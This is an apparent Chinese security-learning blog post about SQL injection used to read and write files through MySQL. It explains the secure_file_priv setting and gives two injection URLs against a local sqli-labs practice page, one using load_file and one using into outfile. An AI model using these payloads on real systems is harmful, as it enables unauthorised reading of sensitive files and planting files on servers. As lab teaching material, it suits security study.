首页 > 数据库 >网安--sql注入(文件读写)

网安--sql注入(文件读写)

时间:2023-10-12 21:34:25浏览次数:30  
标签:文件 secure -- 读写 写入 file sql 网安 priv

读写的内容:

1、用户的信息

2、配置信息

文件读写注入的条件

secure_file_priv限制了mysql导出文件的权限

Linux:

cat/etc/my.cnf

win:

my.ini中的secure_file_priv

secure_file_priv=null            代表不能进行文件读写

secure_file_priv=文件路径    代表能在该文件可以进行读写

secure_file_priv=''                 代表对文件没有读写限制

读取文件

使用函数load_file('文件路径')路径符号只能使用/

http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,load_file(‘E://test1.txt’),3 --+

写入文件

使用函数:Into Outfile(能写入多行,按格式输出)into Dumpfile(只能写入一行且没有输出格式)

http://127.0.0.1/sqli/Less-2/?id=1 union select 1,'text',3 into outfile 'E://test1.txt'--+

 

标签:文件,secure,--,读写,写入,file,sql,网安,priv
From: https://www.cnblogs.com/L-1906/p/17568582.html

相关文章

  • 动态树(Link-Cut Tree)
    算法思想动态树算法用于解决一类树上问题,涉及树边的连接和断开,并借助splay实现高效维护树上路径信息。算法细节见YangZhe的论文代码实现P3690【模板】动态树(LCT)#include<bits/stdc++.h>#definelllonglong#defineilinlineusingnamespacestd;intread(){in......
  • 小干货~ NFS在Linux系统中的应用
    Linux系统中的经典的语句”一切皆文件”,意思就是说在Linux系统中,我们要达成任何目标,都是通过配置文件去实现的。既然这样,那我们就少不了跟文件打交道,今天就跟大家分享下如何在Linux系统中配置网络文件系统(NetworkFileSystem,NFS)服务来达到Linux系统之间的文件共享的目的。......
  • Python 集合(Sets)2
    访问项您无法通过引用索引或键来访问集合中的项。但是,您可以使用for循环遍历集合项,或者使用in关键字检查集合中是否存在指定的值。示例,遍历集合并打印值:thisset={"apple","banana","cherry"}forxinthisset:print(x)示例,检查集合中是否存在"banana":thisset={"......
  • 动态计算平均值
    \[weight=0\\mean=\frac{meam*weight+curVal}{weight+1}\]intweight=0;Vec3ipixel={0,0,0};for(size_tindex=0;index<singlePairFish->fishImgs.size();index++){pixel=(pixel*weight+curPixel)/(weight+1);weight++;}......
  • CSP-2023游记
    Day-9gp终于开网了,做了几道zsq给的题luoguP4306:一开始看到这题觉得复杂度最少是\(\frac{n^3}{w}\),尝试优化了一下,结果发现优化不了,觉得不可做,一看题解,正解竟然真是\(\frac{n^3}{w}\),出题人开2000是不是有病啊。luoguP1407:这题一眼觉得是割边,结果发现是错的。考虑对于原......
  • SQL的学习
     MySQL数据库的应用技术---视图什么是视图英文:view---看见得东西为什么需要视图存在问题复杂得查询语句:每一次使用都需要编写,执行,能不能只写一次,后面可以重复调用--需要共享希望表中的一些字段分享的时候不被其他用户看见,只让其他用户获取我想让他看见的数据可不可将查询语......
  • QT基础教程(QPalette和QIcon)
    (文章目录)前言本篇文章继续讲解QT中的知识,主要为大家讲解QPalette和QIcon。QPalette和QIcon都是Qt框架中用于图形界面设计的类,它们分别用于管理调色板和图标的相关功能。一、QPalette类QPalette(调色板)QPalette类用于管理和控制Qt应用程序的颜色方案,它定义了各种图形界......
  • 标题:计算机音视频的革新与应用
    标题:计算机音视频的革新与应用摘要:计算机音视频技术正在以前所未有的速度发展,并广泛应用于娱乐、教育、通信等领域。本文将探讨计算机音视频的革新和应用,包括虚拟现实、增强现实、多媒体编码与解码技术、音视频传输协议等方面的进展。引言:随着科技的飞速进步,计算机音视频技术在过去......
  • 2023APA招新游戏代码讲解
    0概况招新小游戏是使用C++与Python设计的几款小游戏,并使用Pyside2设计GUI界面。对于萌新们来说,短时间学会游戏开发并不是很实际,本文旨在让大家简单体会游戏的开发过程,如何设计框架、调用模块、编写游戏以及实现代码封装,并不要求大家看完就能完全理解并具备开发游戏的能力。我们......
  • 师生关系
    师生关系令我记忆深刻的老师总体来说,我中小学阶段遇到的老师都不错,其中我最最尊敬、感恩的老师则是何正娟老师,她是我初中三年的语文老师兼班主任,更是我人生的导师,我始终敬爱、仰望的老师。典型事迹毕业后翻看笔记时,我盯着语文笔记本第一面写的“今天是祖国母亲的七十岁生日,我......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99